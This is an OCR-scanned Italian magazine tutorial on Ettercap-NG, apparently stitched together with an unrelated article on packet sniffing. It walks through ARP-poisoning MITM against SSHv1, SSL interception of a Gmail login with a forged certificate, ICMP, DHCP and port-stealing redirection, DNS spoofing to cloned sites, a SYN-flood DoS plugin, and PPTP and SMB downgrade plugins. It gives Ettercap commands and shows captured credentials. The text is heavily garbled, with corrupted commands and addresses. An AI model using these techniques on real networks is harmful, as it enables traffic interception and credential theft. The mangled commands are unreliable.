Il ciient genera un numero casuale di 
1 28-256 bit Che sarà la chiave con cui 
verrà cifrato tutto il traffico, 
Il clìent richiede al server la propria 
Chiave pubblica. 

Il client cifra il numero generato, con la 
chiava pubblica del server e gliela invia. 
Il server decifra con la sua chiave 
privata questo numero ed inizializza la 
sessione. 

Il meccanismo di scambio viene detto a 
chiave "asimmetrica" perché tutto ciò 
che si cifra con la chiave pubblica di 
qualcuno, può essere decifrato solo 
con la sua Chiave privata Provate ora 
ad entrare nell'ottica dell'attacco MITM, 
questo meccanismo non garantisce 
affatto Che la chiave ricevuta sia proprio 
quella del client... Perciò sfruttiamo 
questa falla nell'autenticazione e 
rampolliamoci in questo modo: 

Arp-poisoniamo il client e redirigiamo 
su di noi il suo traffico. 
Arp-poisoniamo il server e facciamo la 
stessa cosa. 

Quando il client invia la sua chiave 
pubblica, ai server inviamo la NOSTRA 
chiave. 

Quando il server invia al dient la sua 



Registriamo sia chiave pubblica del 
server che del client. 

In questo modo il client cifrerà il traffico 
verso il server con la nostra chiave 
pubblica, e cosi farà anche il server. 
Saremo quindi in grado di spiare la 
connessione sia da dient-server che da 
server-dient (questo si dice Fuil-Duplex 
MITM), ovviamente tutto il traffico in 
arrivo su di noi verrà decifrato, loggato 
e quindi cifrato di nuovo con la chiave 
del seroer o del dient. I due computer 
non noteranno nulla so quella è la loro 
prima connessione, ma se invece si 
tratta della seconda o successive, asti 
in automatico ci avviserà che la chiave 
è camolata, tuttavia molti utenti non 
tengono conto dell'avviso (pensando 
magari che la chiave è cambiata a 
causa di un aggiornamento di ssh) e 
quindi si espongono a questo tipo di 
attacco. 



LA PRATICA 

Ma vediamo in pratica come è possibile 
log gare le password o il traffico su un 
server sshl . Nell'esempio vedremo un 
attacco MITM tra una macchina 
(1 92.1 67.1 .8) e un server sshl , avviamo 
Ettercap con questi parametri: 

# ettercap -Tq -M-. 
orp mi. 167. 1.8/ i/22 

Diciamo cosi al programma di avviarsi 
in modalità testo, senza stampare tutti i 
pacchetti, di fare un attacco MITM 
tramite arp-poisoning (sempre perche' il 
mio lab si trova su switch) tra l'host 
192.1 67.1 .8 e tutte le connessioni che 
questo host fa sulla porta 22. 
Portiamoci quindi suii 'host 192,167.1,8 
ed apriamo una connessione ssh: 

if ssh HYPERLINK- 
"inni l to : mi rk?192 , 167 , 1 , W- 
mirk#192. 167. 1.10 

Vediamo subito che SSH ci avverte del 
cambiamento della chiave (perché 
durante la prima connessione la chiave 
viene registrata), tuttavia scegliendo di 



? WARNING: REMOTE HOST 
IDENTIFICATION KAS CHANGEO! è 



IT IS POSSIBLE THAT SOMEONE IS 
DOING SOMETHING NASTY! 
Someone could be eavesdropping on 
you ri.ght now (mnn-in-the-middle 
attodO! 

It is olso possibte thot the RSA 

host key has just been changed. 

The fingerpT'int far the RSA key 

sent by the remote host is 

44:16: W:dB:ll:4d;cf:Jfl;S7:ll:a9:5 

S:25:63;c5:fc- 

Please contact your system 

adirà nistrotor. 

Come da copione la password di ssh 
viene loggata all'istante: 

SSH : 192.167.1. 10:22 -> USER:- 
mirk PASS: p4ssw@rD 

CONCLUDENDO 

Ma volendo anche tutto il traffico ssh 
sarebbe visibile, perciò potremmo 
spiare senza alcun problema tutta la 
sessione che sta facendo l'utente. E 
questo vaie con sshl , ma per sstìZ> In 
questo caso viene utilizzato il Diffie- 
Hellman come algoritmo di scambio 
delle chiavi. Diffie-Hellman complicale 
cose perché indude dei check [firma 
digitalmente una chiave di scambio) per 
verificare che effettivamente la chiave 
ricevuta sia quella del dient o del 
server... 
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^ ( iniziato questo lungo 

percorso alla scoperta di 
Etiercap-NG die giunge 
finalmente alla fine. 

Tecnicamente è molto, molto 
complesso aggirare un tipo di 
autenticazione con algoritmo Diffiè- 
Hellman, ma noi possiamo sempre 
porne rimedio alla situazione con un 
semplice trucco. Provate a connettervi 
via telnet alla porta 22 Cfl un server sshl , 
ottenete questo banner: 



Mentre coilegandovi ad un server ssh2 
otterrete questo: 



Se vedete Ssh-1 ,5 0 1 .55 allora il server 
su pporta soltanto sshl , se vedete 
ssh-1 .99 o superiori, allora il server 
supporta sia sshl che ssh2, questo 
non vi fa venire in mente nulFa? Cosa 
succederebbe se in fase di connessione 
il banner"SSH-2.u" del server venisse 
sostituito con "SSH-1 .5"? Che il cileni 
crederebbe di dialogare con un server 
in grado di supportare soltanto sshl e 
quindi utilizzerebbe il classico algoritmo 
di scambio senza firma digitale... 
Pertanto i! vostro traffico verrebbe 
intercettato senza che voi notereste 
nulla, o quasi. 

Proteggersi da questo tipo di attacco 
risulta comunque abbastanza semplice, 
aggiungere questa riga nel /©to' 
jxrnfìg del vostro server: 



1 : ¥ 1 « 




Parte II 



SECONDA E GGNCLU5IVA 

PARTE. DEDICATA 

A ÉTTERCAP-N E. 
» UN COMPLETO REWRITE 

BL^TTERCAP. UN TDDL 

COMPLETAMENTE ÌTALIAND 
■ EHE E AMATO DAGLI 

•J'S MAN ETTO M" E □ PIATO 

DAGLI AMMINISTRATORI 

Di SISTEMA... 




Protocol l 



Una volta riawiato sshd il vostro 
server non utilizzerà più sshl , quando 
vi trovate dal lato client avviate ssh in 
questa maniera: 

$ ssh -2 user#rost. . 

Chiedete cosi al client di utilizzare solo 
ssli2 e di ignorare i request ssf)1 , in 
caso di insuccesso verrete avvertiti con 



Protocol major versions - 
differ: l vs. 1 

Se invece avete proprio bisogno di 
sshl , allora in fase di connessione al 
server assicuratevi sempre di leggere 
eventuali messaggi di waming e di non 
fidarvi mai se la chiave è cambiata... 
Qualcuno potrebbe stare nel mezzo. 



I CERTIFICATI 

Ora die sappiamo come fare un 
MfTM su una connessione in chiaro, 
una connessione in sshl eunassh2, 



baluardo, ovvero ì certificati? 
Grazie ai certificati siamo in grado di 
stabilire se la chiave inviataci da un 
server è realmente la sua o mene, ma 
possiamo davvero esseme sicuri? 
In realtà grazie ad Ettercap, e con la 
speranza che un utente non inizi a 
leggere tutti i campi del certificato, 
saremo In grado di sniffare una 
connessione SSL, se non ci credete 
facciamo una prova: per prima cosa 
pensate ad un luogo dove avete un 
account con SSL (ad esempio gmail. 
cora ebay.it, poste.it e molti altri), io ho 
scelto gmail.com. Una volta puntato 
il browser sull'uri, Firefox mi ha subito 
chiesto di accettare un certificato, 
eccolo qui: 




Guardatelo bene, il certificato sembra 
proprio provenire da google ed infatti 
è Stato verificato (in alto), motivo per 
cui posso continuare a navigare 





modifichiamo questa riga; 

ec_UÌ<J - 65534 # 
rwbody is the defautt 



ec^uid = 0 -. 

# robody is the defoult 

Didanno cosi ad Ettercap di non 
droppàre i privilegi di foot dopo esser 
stato avviato. Quindi scorriamo in 
basso il file e decommentiamo queste 
due righe: 

S if you use ipchains: 
#redir_com!icincL.Qn - -, 

"ipchoins -A input -i Jtiface - 

-p tcp -s 0/0 -d 0/0 Sport -j - 

RE DIRECT JSr-pc-rt" 

Spedì r_co*iwand_off ■ - 

"ipetains -D input -i Kifoce - 

-p tcp -s 0/0 -d 8/0 ftport -j n 

REDIRECT SSrport" 

# if you use iptables: -, 

redir.goirarortd-Ofl ■ - 
"iptables -t not -A PRERQUTING-. 
-i JSiface -p tcp --dport JSport-j 
REDIRECT -to-port «rport" - 

redir_comrand_off ■ - 
"iptables -t not -D PREROUTING- 
-i Siface -p tcp --ttport SSport-j 
REDIRECT -to-port frport" 

Se usate ipchains levate i commenti 
ai primi due comandi, altrimenti levate 
i commenti alla terza e quarta riga, 
cosi corna ho fatto io, visto che uso 
iptables, 

Questo comando servirà a redirigere 
il traffico correttamente senza che il 
iayer SSL trovi qualcosa di sospetto, 
avviamo quindi Ettercap con questi 
parametri: 

# ettercop -Tq -M - 
grp:ren»te /192. 168.1,*/ //443 

Come vedete abbiamo aggiunto un 
parametro a -M cioè: "arp:remcite", 
il primo lo conoscete, il secondo 
significa che vogliamo fare un attacco 



vogliamo controllare. //443 significa 
che vogliamo monitorare qualunque 
connessione sulla porta 443 che è 
SSL Colleghiamoci quindi al sito 
scelto e guardiamo il certificato: 



Come vedete a parte i fingerprint 
l'unica differenza è la prima riga 
che ci dice o meno se il certificato è 
stato verificato. I informazione queste 
che dobbiamo visualizzare a mano 
chiedendo al browser di farci vedere 
il certificato (con Morilta Firefox], ma 
in realtà sono molto pochi gli utenti 
che perdono tempo a guardare ogni 
volta se il certificato di un sito è valido 
o meno. Vediamo cosa succede se 
effettuiamo il login: 

KTTP : 66.102.11.99:443 -> 
USER: mox PASS: sniffar INFO: 
http; : /Awh . google . con/a ecounts/ 
Serviti Login?seroice-moit&passi 
ve=t rue&conti nue=http ;// gmpi 1 , 
google.com/gniail 

E puntuale come un orologio al cesio 
arriva il nostro login e la relativa 
password. 

Fino ad ora abbiamo utilizzato un 
solo tipo di attacco MITM, cioè 
l'arp-poisoning, ovviamente non è il 
scio, e gli autori di Ettercap lo sanno, 
infatti il programma mette a nostra 
disposizione altre tre opzioni che 



MITM via ICMP. in questo caso 
Viene sfruttata una features de! 
protocollo ICMP per redirigere il 
traffico. ICMPèun protocollo Che 
serve esclusivamente ad inviare alle 
macchine messaggi amministrativi, 
uno dei messaggi più interessanti (per 
i nostri scopi) è riCMP_REDIRECr 
che serve a dire ad un client che 
esiste una rotta migliore per il proprio 



(ogni salto è detto 'tiop"). Se noi 
fossimo in grado di "spoetare" un 
redirect (.cioè inviare un pacchetto con 
IP falso) all'host vittima, potremmo 
farcì inviare il suo traffico, tutto 
questo senza avvelenare l'arp cache 
della vìttima, Questo attacco è più 
delicato del l'arp poìsonìng, può 
essere effettuato solo su reti cablate 
su hub ed in più ci fornisce un Half- 
Duplex MITM perché ii gateway reale 
non accetta mai !CMP_F1EDIRECT 
da un host che fa parte della sua Ean 
(saremo quindi in grado di modificare 
solo il traffico che dalla vittima va 
verso la rete e non quello che dalla 
rete raggiunge fa vìttima, ma essendo 
su un hub potremo comunque vederlo 
tutto). Sebbene questo attacco abbia 
delle limitazioni, risulta molto più 
stealth di un arp-poisoning. Utilizzarlo 
è piuttosto sempCce, dobbiamo 
soltanto conoscere l'IP ed II MAC del 
gateway, potete ottenerli cosi: 

# ™te -n I grep -v "2S5." I - 
grep "0.0,0.0" -, 



Leggendo II secondo campo avrete 
l'IP del gateway (192.168.1.1), per 
ottenerne it MAC basterà fare un 
arping sull'IP appena ottenuto: 

* orping 192.163.1.1 I grep ^ 

BÉy - 

lijhicost i-eply frm 192. 168.1.1 
: ;|B0:C1:G:C3:DS:M] 0.tò3*s 



Sostituite ai ". .." i parametri di cui 
avete bisogno, 

Il terzo tipo di attacco, anch'esso 
in Naif- Duplex attuabile solo su 
rete cablata con hub è il metodo 
DHCP. Senza entrare nel dettaglio 
diremo ohe un server dhcp fomèsc 
automaticamente un IP libero alle 
macchine che sì sono appena 
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invia un dhcp-request e il dhcp-server 
isponde con un pacchetto contenente 
l'IP e il gateway della rete. Ettercap non 
fa altro che spaofare un falso pacchetto, 
inserendo un IP lìbera, e come gateway 
N nostro IP. In questo caso avremo 
bisogno di tre parametri, il primo è un 
range di IP della lan sicuramente liberi, 
questi potete trovarli con un ping, con i 
tcp-ping di nmap, oppure con l'apposito 
a iixjin che travate nel menu "Plugirf 
di Ettercap. La netmask e il server 
dns. Supponiamo di esserci assicurati 
(tramite i metodi descrìtti poco sopra) 
che tutti gli IP da 192.168.1 .20 a 
192. 163.1 .50 sono liberi, non ci resta 
che trovare la netmask della nostra rete, 
se non la conoscete fate: 

S /sbin/ifcorrfig I grep Hask 
inrt nddr : 192. 168.1. S- 
Beast:192.16S.l.Z55 - 
*Kk:2S5. 255. 255.8 
inet addr: 127.8. 0,1 - 
Mosk:255.0.0.0 

E leggete la mask assodata al vostro 
IP (in questo caso 255.255,255.0), per il 
dns basterà fare; 

S grep nnneserver /etc/resolv. p 
eonf 

rameserver 192.168.1.2 

Per avviare l'attacco dovrete specificare 
i tre parametri appena scoperti: 

4 ettereop . . . -tk 

dTiep:192.16S.20--. 

50/255 . 255 . 255 . 0/192 . 168 . 1 . 2 

L'ultimo tipo di attacco a nostra 
deposizione, stavolta utile soltanto 
su réti cablate con switchm, dove 
rarp-poisoning non funziona (perché 
g6 ip sono assegnati staticamente), si 
chiama port-stealirtg. Come detto poco 
sopra, uno switch in genere opera a 
LayerZ questo significa die vengono 
letti soltanto i MAC dei vari pacchetti, 
ma quando uno switch viene acceso le 
sue tabelle sono vuote perciò non può 
sapere una macchina a quale porta è 
connessa Lo switch osserva dunque if 
e segna in una tabella l'indirizzo 
sorgente dei pacchetti ohe escono 
un 



1 11:22:33:44:55:66 

2 M:BB:CC:DD:EE:FF 
ì A1:B1:C1:D1:E1:F1 

Ma queste tabelle ovviamente non 
sono statiche [a meno che non lo 
siano state rese di proposito) perché 
una macchina può cambiane pc o può 
esser spostata da una porta all'altra, 
perciò se lo switch vede che da una 
porta esce un MAC sorgente diverso 
da quello che trova nella tabella, 
ovviamente aggiorna la memoria per 
riflettere la situazione attuale. E il port- 
stealìng gioca su questo fatto, ruba la 
porta delio suiritch inviando dì continuo 
dei pacchetti che hanno come MAC 
sorgente il MAC della vittima, e come 
destinatario noi. In questa maniera 
lo switch crede che la porta da Cui 
mandiamo i dati appartenga alla vittima 
e quindi redirige su dì noi il suo traffico, 
dopo averlo esaminato ovviamente lo 
rimanda all'host reale. Questo metodo 
è molto efficace ma state attenti perché 
tale pratica genera moltissimo traffico, e 
potrebbe anche dar fastìdio agli switch, 
i danni sono temporanei, ma tenete a 
mente che in quafche occasione questo 
metodo non è raccomandabile, 
Per loggare il traffico che fa un 
determinato host verso la porta 80, 
dovremo avviare Ettercap con questi 
parametri: 

# ettercap -Tq -M - 
port : remote /19Z.1&S . 1.3/ fm 

Ricordate di settare etter.conf come 
nel caso del MrTM con i certificati, 
altrimenti il port-stealing non funzionerà 
Se la vostra rete è grande, e ci sono 
molti switch in catena, allora la vittima 
potrebbe essere su uno switch diverso 
dal vostro, in questo caso la tecnica 
cambia soltanto per quanto riguarda il 
MAC address di destinazione, che non 
sarà più quello dell'attaccante ma un 
MAC casuale. 

Con questo accorgimento I pacchetti 
che invàno verranno propagati sugli 
altri switch (perché nessuno conosce 
quelia destinazione) e riusciremo quindi 
a rubare la porta anche su uno switch 



Ettercap mette a nostra disposizione 
una serie di utili plug-in che svolgono 
delle funzioni motto comode, 
passeremo in rassegna tutti quelli 
presenti e vedremo che è anche 
possibile fame di nostri, il primo 
comando da damper vedere tutti i 
plug-in presenti e: 

# ettercap -P list 

Esaminiamo quelli presenti di default 
nella taraall. Il primo è arp_cop, 
possiamo avviarlo cosi: 

£ ettercap -TOj 5 arp„cop // 



Diciamo a ettercap di avviarsi in 
modalità testuale, senza stampare 
usemame e password ("-Q") di caricare 
un plugin ("-FI che è arp_cop, e di 
controllare tutta la LAN \'lf\ Atp cop è 
un plugnn amministrativo che sonda il 
traffico alla ricerca di pacchetti sospetti, 
come quel Ir che tentano di fare arp- 
poisoniig. 

Il secondo plug-in della lista è autoadd, 
basterà aggiungere il parametro "-P 
autoadd" a quelli usati per avviare 
Ettercap, in questo modo verrano 
monitorati tutti gii arp-request per 
vedere se una macchina si è appena 
aggiunta alla rete, in caso positivo tale 
macchina verrà aggiunta al pool del 
nostri target. 

Il terzo plug-in è chkjmison, non 
cercate di avviarlo da riga di comando 
perché non avrebbe senso vedere 
se il poisoning ha avuto successo 
prima di farlo. Quindi avviate Ettercap 
come solito, iniziate ii poisoning 
e poi avviate il plug-in dal relativo 
menu. Il funzionamento non è per 
nulla complesso, il modulo invia un 
ICMP-echo-request spoetato ad ogni 
vittima del nostro poisoning (ci sono 
tre macchine, A che è la vittima, G il 
gateway e B siamo noi, il modulo invia 
ad A un ICMP-echc-requestcon l'IP di 
G come sorgente), se nCMP-echo-repty 
ci arriva indietro, allora il poisoning ha 
avuto Successo, altrimenti qualcosa non 
è andata per il verso giusto. 
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ma, grazie a questo modulo, potremo 
intercettare i req ucst ai dns e dirottarli 
sugli IP che desideriamo, in questo 
modo possiamo costruire dei siti cloni 
d quelli che vogliamo monitorare, e 
quindi possiamo seguire l'utente e 
vedere cosata, non è di certo molto 
etico, ma potrebbero anche esistere 
valide motivazione pertanto. 



D □ SATTAC K 

il quinto plug-in è dos .attack e 
può tornarci utile se per qualche 
motivo dobbiamo cioccare un host 
(vedremo poi che esiste anche un 
altro ptugin adatto), utilizza un SYN 
flood leggermente modificato. Per 
prima cosa viene fatto un portscan 
alia macchina, appena viene trovata 
una porta aperta vengono inviati dei 
SYN su tale porta (con un IP fasullo), 
la vittima risponderà con un SYN-ACK 
che veni intercettato, notate berte, 
a La(yer2 e quindi gli verrà inviato 
un ACK, la connessione risulterà 
quffidi stabilita, Ripetendo il processo 
svariate migliaia di volte (e sapendo 
che ogni connessione aperta utilizza 
circa 1 6kb dì memoria) la macchina 
verta completamente bloccata in 
pochissimi secondi, per avviarlo: 

# ettercap -TQP dos.attock 

Il sesto piug-in è dummy, ir realtà si 
tratta dì un plug-in "scheletro" per far 
vedere come va scritto un modulo per 
Ettercap. 

Il settimo plug-in èfind_oonn, la sua 
funzione è quella di visualizzare tutti 
gli host ai quali una macchina cerca di 
connettersi, potete testarlo così: 

# ettercop -TQzP fintLconn 

L'ottavo plug-in è fìnd_ettercap, come 
suggerisce il nome serve per vedere 
se ettercap Sta inviando pacchetti 
sulla lan, questo metodo non risulta 
totalmente affidabile perché si basa su 
determinati valori e flag impostati sui 



Il nono plug-in è f indjp, questo 
modulo risulte piuttosto utile quando 
abbiamo bisogno di un IP inutilizzato 
(perché la rete non utilizza un DHCP, 
oppure perche abbiamo bisogno di 
un IP libero per usare altri plug-in). 
Possiamo lanciarlo in questa maniera: 

# ettercop -TQP fintLip // 

0 possiamo specificare un pool di IP 
da scannare: 

U ettercap -TQP tìnd^ip -, 
/192.168. 1.1-25/ 

Il decimo plug-in è finger, serve a fare 
il fingerprint passivo di un host (in 
realtà non è completamente passivo 
perché Si connette aìl'host tramite 
una connecH) piuttosto che restare in 
ascolto ad analizzare H suo traffico) al 
fine di farci conoscere il suo sistema 
operativo. 

Dobbiamo soltanto indicare ad 
Ettercap quali host e quali porte 
utilizzare: 

# ettercap -TzP finger - 
✓192. 168, 1,1-10/22 

Fingerprinting -. 
192. 168. 1.1:22... 

FINGERPRINT : i 

1010:00B5:D0:WT:0:1:1:0:B:10 

OP E RATING SYSTEM : unknown -, 
fingerprint (pléase submit it) 

NEAREST OHE IS : Ci SCO 10$ 

Fingerprinting 192.168.1.4:22... 

FINGERPRINT : - 
17C1:14D2:2O:WS:0:1:1:0:A.:20 
QPERATING SYSTEM : Linux 2,4.xx 

L'undicesimo plug-in della lista è 
finger submìt, logicamente serve ad 
inviare un fingerprint sconosciuto al 
sito di Ettercap. 

Il dodicesimo plug-in è gre relay. 
senza entrare troppo nel merito di 
cosa sia un tunnel GRE, vi dirò che 
questo plugtn crea un tunnel ORE 



che invia il traffico fatto dal router ad 
Ettercap, e quindi lo rimanda indietro. 
Per fare ciò è però necessario un 
host fasullo che deve Ri rare su un IP 
inutilizzato della rete (ecco che toma 
utile find ip). 



GWJDISCLJVER 

Il tredicesimo plugin è gw_disoover, 
serve a trovare i! gataway di una rete 
(molto utile quando stiamo facendo 
penetration-testing su una Wlanflan 
e non abbiamo idea di dove si trovi il 
gateway). Per far ciò viene inviato un 
pacchetto ad un IP estemo alla lan con 
MAC address di destiri astore il MAC 
di un host locale. Se Ettercap vede il 
relativo SYN+ACK, allora vuol dire che 
qucil'host ha inviato in rete il pacchetto 
e quindi è il gateway. 

ì? ettercap -TP gw.discover - 
/192. 168. 1.1-255/ 

li quattordicesimo plug-in è isolate, 
come suggerisce il nome serve ad 
isolare un host dalla rete, a differenza 
di dos_atteck questo modulo non 
bfocca la macchina utilizzando tutte le 
sue risorse ma avvelena la cache con 
pacchetti che associano ad ogni IP 
della lan il MAC address della vittima, 
in questo modo ogni pacchetto della 
macchina verrà inviato a se stessa. 
Possiamo scegliere di isolarlo da tutta 
la lan o da un pool di macchine: 

# ettercap -TzaP isolate -, 
mi.VóS.l.U // <- isolalo da 
tutta la lan -. 

# ettercap -TP isolate -, 
/192. 168.1.1/ /VÌI. 168. 1.2-6/ -i 
<- isolalo solo dn questo pool 
di ip 

Il quindicesimo plug-in è linotype e 
serve per vedere se siamo su un hub 
o uno Swrtch, il tutto avviene inviando 
un Arp-request spoofato, se siamo 
in grado di vederne la risposte allora 
siamo su un hub, altrimenti è uno 
switcti. 

Il sedicesimo plug-in è pptp_chapms1 , 
quésto modulo va attivato dopo aver 



;ker journal - 



rcap -TP stp.m 



PvsZ che risulta più difficile da subito dopo l'ARP request invialo in 
broadcast. 



diciassettesimo plug-in è pptp_ctear, 
serve (dopo aver iniziato un attacco 
MITM) a non richiedere né compressione 
né crittografia nei turine! pptp durante la 
negoziazione. 



li diciott 
e serve 
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diciottesimo plug-in è pptp_pap 
serve a far negoziale in Chiare 
autenticazione su un tunnel PPTP. 



PPTP RENEE 



li diciannovesimo plug-in, sempre 
dedicato ai tunnel PPTP, è pptp.reneg 
che serve a forzare la rinegoziazione, 
ovviamente toma molto utile quando 
vogliamo utilizzare un altro plug-in pptp 
ma siamo arrivati tardi e la negoziazione 
è già avvenuta. 

Il ventesimo plug-in è randjtood, 
inonda la lan con MAC address casuali, 
m questa maniera molti swltch, una 
volta riempite le tabelle, si posizionano 
automaticamente in modalità 
ripetitore, funzionando quindi da hub e 
facilitandoci di molto la vita. 

Il ventunesimo plug-in è remote, 
browser, serve a monitorare in realtime 
tutti gli uri die visita un host. vengono 
mostrati solo i GET sulle pagine e non i 
request fatti alte immagini. 

Il ventidiiesimo plug-in è reply_atp, serve 
a rispondere agli arp-request fatti da un 
host con il nostro MAC address: 

# ettercap -TQzP reply_orp // 

Il ventitreesimo plug-in è reporson_arp, 
serve come supporto agli attacchi 
MITM e risulta utile se usato insieme a 
repty_arp. 

L'esempio riportato nell'helpè molto 
chiaro: se stiamo poisonando la cache 
al un gruppo di macchine impersonando 
['host B, e il vero host B effettua uh 
broadcast ARP request verso un terzo 
host, adora il gruppo di macchine 
personale può vedere il pacchetto e 



# ettercap -ì" -M arp: remote 
- -P repoison_arp / - 

I92.i6s.i.i0-z0/ /m.m.i.y 

Il ventiquattresimo plug-in è scan_ 
poisoner, come suggerisce il nome 
serve a controllare che qualcuno non 
Stia poisonando la cache degli altri 
host, effettua il controllo verificando che 
due host non abbiano lo stesso MAC 
address: 

# ettercap -TQP -, sceri- 
poisoner // 

Il venticinquesimo plug-in è search_ 
promise, serve a verificare quali host 
s| trovano in modalità promiscua, e 

10 fa inviando due tipi di arp-request 
malformati, se un host risponde vuol 
dire che è probabilmente in modalità 
promiscua. Da notare die possono 
essere generati dei falsi-positivi: 

# ettercap -TQP search. - 
promise /V 

11 ventiseiesimo plug-in è smb_clear, 
questo modulo va usato dopo un 
attacco MITM e serve a far viaggiare in 
chiaro 1e password di samba. 

Il ventisettesimo plug-in è smb_down, 
anch'esso va usato dopo un attacco 
MITM e serve a non far scambiare le 
password in NTLM2, grazie a questo 
accorgimento sarà possibile crackare 
gli hash con LOpihc rack in pochissimi 
secondi. 

Il ventottesimo, ed Ultimo plug-in, è 
stpjnmangler, serve a diventare lo switch 
con più alta priorità all'interno di uno 
spanning trae, ovviamente se non ci 
sono più switch, o non utilizzano STP, 
questo piug-in è inutile. Se vediamo 
Che non funziona e troviamo un altro 
swftah con priorità più alta delta nostra, 
dobbiamo abbassare il valore numerico 
del nostro MAC address (Sfconfrg ethO 
hw ether nuovo_mac). 



Se avete qualche idea per un nuovo 
plug-in potete leggere il manuale di 
Ettercap per scoprire come fare. 



CDNCLUSID 

Ettercap è un tool molto potente che 
utilizzato insieme ad altri strumenti 
consente di effettuare u n hijacking 
completo delle connessioni. I £ 
plug-in sopperiscono a molte ' 
del programma e la possibilità di 
espanderlo lo rende molto 
Tuttavìa strumenti come questi ci 
fanno capire quanto complesso sìa il 
compito deila gestione della sicurezza 
su una rete Lan, specie se dì grandi 
dimensioni. Gli attacchi MITM sono 
realtà, e sebbene siano estremamente 
complessi da attuare su due host 
diventano (su: reti locali) assolu 
banali grazie a tool come Ette 
mio consiglio è di considerare le 
sempre come terreno ostile, e 
accedere a servizi che richiedano 
password in chiaro [come smtpr pop3, 
ftp, telnet, web). Se proprio dovete fari< 
assicuratevi Che non ci siano poisoner 
sulla rete, ma anche in questa maniera 
non saprete se il gateway fogga il 
traffico. Utilizzate switefi dove possi bik 
e fate un ampio uso dì crittografìa 
forte (ssh, sep, sfpt, ipsec], controllate 
i f ingerprim delle vostre chiavi, magari 
annotandoli, verificate r certificati 
e state sempre attentì a quello che 
inviate sulla rete. Ricordate che con i 
vostri dati un malitenzionato potrebbe 
causarvi molti problemi, perciò se non 
ritenete importante ia vostra privacy, 
pensate almeno alla vostra sicurezza, 
specie in questi tempi dove i tool di 
phishlng si scaricano per nulla e I ladri 
di identità sono più di quanti ci sì possa 
immaginare. Spero che questo artìcolo 
vi abbia aiutato a vedere "l'hacking" 
non più come una parola astratta, ma 
come un fatto tangibile e riproducibile 
con pochissimi strumenti, Siate sempre 
curiosi perché è l'unico mezzo che 
abbiamo per farfare ai nostri strumenti, 
ciò per cui non sono nati. E' la curiosità 
che per anni ha contraddistinto i primi 
veri hacker, non ia voglia di far danni. 
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lo stratd pi u basso 
dell'infrastruttura di rete e 
5pe5sd ignorato dagli utenti 
ghe ndn interagiscono con 
esso . Senza considerare 
deliberatamente questo livello è 
i mpossibile costruire un sistema 
sicuro per le applicazioni che 
agiscono a livelli più elevati. 



ID SNIFFO, 
TU SNIFFI, 
EGLI SNIFFA 

Sniffare è un'azione passiva 
ossia vengono elaborati 
solo i dati che raggiungono 
autonomamente lo "sniffer". 
Vuol dire ohe i dati devono 
viaggiare autonomamente 
perché non viene fatta 
alcuna azione per andarseli a 
prendere. 

il concetto è fondamentale 
perché generalmente le 
reti sono segmentate da 
innumerevoli apparati, come ad 
esempio gli switch, che creano 
circuiti virtuali tra i nodi, 
oppure da router che smistano 
i pacchetti soltanto sul nodo di 
competenza. 

Se volessimo analizzare il 
traffico generato da un server 
collegato direttamente ad 
uno switch layer 2 o layer 3, 
che oggigiorno è la regola, 
occorrerebbe replicare 
in mirroring la porta del 



collegamento del server su di 
una seconda porta dello switch 
dove collocare lo sniffer, 
In tal modo tutti i dati che 
transitano sui circuiti virtuali 
tra ì diversi nodi gestiti 
dallo switch, che altrimenti 
sarebbero invisibili, possono 
essere rilevati. 
Per questa ragione, se 
pensiamo di utilizzare uno 
sniffer da casa, a valle di una 
linea ADSL, per scoprire chissà 
quale segreto, probabilmente 
resteremmo delusi. 
Di contro, utilizzare uno 
strumento simile al lavoro 
□ all'Università potrebbe 
essere visto come un attacco 
all'integrità del sistema e sa 
la policy aziendali prevedono 
il licenziamento, attenzione a 
non farvi beccare! 
Ciò non toglie che uno sniffer 
può rivelarsi uno strumento 
insostituibile per capire in che 
modo comunicano in rete le 
applicazioni che normalmente 
utiSizziamo, ma andiamo con 
ordine. 



LIVELLI ED 
INDIRIZZI 

Secondo il modello ISO/OSI di 
riferimento, tutte le interfacce 
che insistono sulla medesima 
rete ethernet hanno un indirizzo 
fisico al livello più basso Che 
normalmente è differente 
dall'Indirizzo utilizzato dal 
protocollo, che si chiama MAC 
address. Oltre a questo, tutti i 
nodi dispongono di un indirizzo 
di broadcast univoco per tutto 
il segmento di rete. Nel normale 
funzionamento della scheda di 
rete, viene elaborato solamente 
il pacchetto che contiene il 
proprio indirizzo fisico o quello 
di broadcast, ignorando tutti gli 
altri. 

Lo sniffer, invece, raccoglie 
tutto. Essenzialmente presenta 
all'utente una sequenza ordinata 
di pacchetti Che contengono 
principalmente l'ora in cui sono 
stati ricevuti, l'indirizzo sorgente, 
l'indirizzo di destinazione ed il 
contenuto. 
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UN'ESAUSTIVA DESCRIZIONE DELLE FUNZIONALITÀ DI CIASCUNO, 



Avendo a disposizione una 
sequenza di questa tipo è 
possibile ricostruire il traffico 
tra i diversi nodi ma occorre 
disporre di un discreto spazio 
sul disco perché in alcune 
realtà possono transitare 
migliaia di pacchetti al secondo 
che, se consideriamo che 
ciascuno occupa almeno 
64 byte, si capisce come si 
possa rapidamente generare 
una quantità esagerata dì 
informazioni. 



Normalmente proprio per 
questa ragione è meglio 
utilizzare dei filtri con i 
quali limitarsi a catturare 
esclusivamente quei pacchetti 
che realmente reputiamo degni 
dì interesse. 



MA COSA 
SNIFFO? 

L'attività più difficoltosa 
nell'uso di uno sniffer è 



decidere che cosa catturare. 
Occorre avere una profonda 
conoscenza dei meccanismi dei 
diversi protocolli di rete e non 
solo del TCP/IP. 
Per prima cosa decidiamo che 
cosa catturare e stabiliamo a 
che livello della pila ISO/OSI 
vogliamo lavorare, 
Al primo livello possiamo 
raccogliere i segnali Bluetooth, 
DSL, RS-232 ed altri, mentre 
nel secondo livello possiamo 
raccogliere i segnali Ethernet, 
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PPP, Frame Relay, Token 
Ring, Wi-Fi, ATM ed altri. In 
entrambi i livelli dobbiamo 
ai/ere a disposizione una 
sonda particolare in grado di 
interpretare tali segnali. Nel 
nostro caso consideriamo 
unicamente la rete ethernet 
perché possiamo utilizzare 
come sonda ia scheda ethernet 
del nostro computer. 
Sulla rete ethernet, al terzo 
livello, esistono vari protocolli 
alternativi all'IP (Internet 
Protocol) che conosciamo così 
bene. Ad esempio possiamo 
citare i protocolli IPX, X.25 
e DHCP solo per indicare i 
principali. 

Non Si tratta di teoria. In pratica 
una stampante con interfaccia 
dì rete configurata male, 
collegata sullo switch di casa, 
potrebbe generare traffico 
IPX assolutamente inutile. Se 
coilegate uno sniffer e rilevate 
traffico IPX o Appletalk senza 
avere un Macintosh, qualcosa 
non quadra. 

Salendo al quarto livello 
possiamo rilevare 
pacchetti TCP o UDP, 
